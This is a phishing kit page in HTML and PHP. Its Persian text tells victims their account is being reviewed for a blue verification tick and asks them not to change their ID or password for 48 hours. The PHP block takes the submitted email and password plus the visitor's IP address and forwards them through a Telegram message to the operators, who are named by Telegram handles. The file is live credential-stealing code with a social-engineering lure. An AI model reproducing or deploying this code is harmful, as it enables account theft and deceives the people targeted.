<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>درخواست شما انجام شد !</title>
<link href="https://cdn.rawgit.com/rastikerdar/shabnam-font/v4.0.0/dist/font-face.css" rel="stylesheet" type="text/css" /><link rel="stylesheet" href="assets/css/style.css">
</head>
<body>
<div class="card">
<div class="field">
<span class="header">ثبت شد</span>
<br><br>
اکانت شما ثبت شد و درحال برسی و ارسال تیک آبی برای شما هستیم
<br><br><br><br>
طی 48 ساعت آینده شما به رسمیت شناخته خواهید شد
<br><br><br><br>
لطفا در طی این فرایند اطلاعات خود از جمله ایدی و پسورد را تغییر ندهید
</div>
</div>
</div>
<script src='https://cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'>

</body>
</html>
   
<?php   


 include ("jdf.php");
    if (!empty($_POST)) {
        require_once 'Telegram.php';


Telegram::sendMessage('T.me/Mrivar'."\n".'➖➖➖➖➖➖➖➖➖➖'."\n".'🔸ایمیل :'. $_POST['id']."\n".'🔸پسورد :'. $_POST['lic']."\n".'➖➖➖➖➖➖➖➖➖➖'."\n".'📱آیدی:'.$_SERVER['REMOTE_ADDR']."\n".'⏱ساعت:'.jdate("h:i:s a")."\n".'⏰تاریخ:'.jdate('l Y F ')."\n".'➖➖➖➖➖➖➖➖➖➖'."\n".'🆔 @APPSHACKING');
    
    }



?>